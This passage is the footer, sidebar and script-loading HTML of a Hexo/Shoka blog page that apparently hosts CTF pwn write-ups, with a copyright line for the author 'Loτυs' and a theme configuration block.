    <span><a href="/2022/07/24/DASCTF7%E6%9C%88%E8%B5%8B%E8%83%BD%E8%B5%9Bpwn%20wp/" title="DASCTF7月赋能赛pwn wp">DASCTF7月赋能赛pwn wp</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2023</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Loτυs @ Loτυs</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2021/09/03/babyrop/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
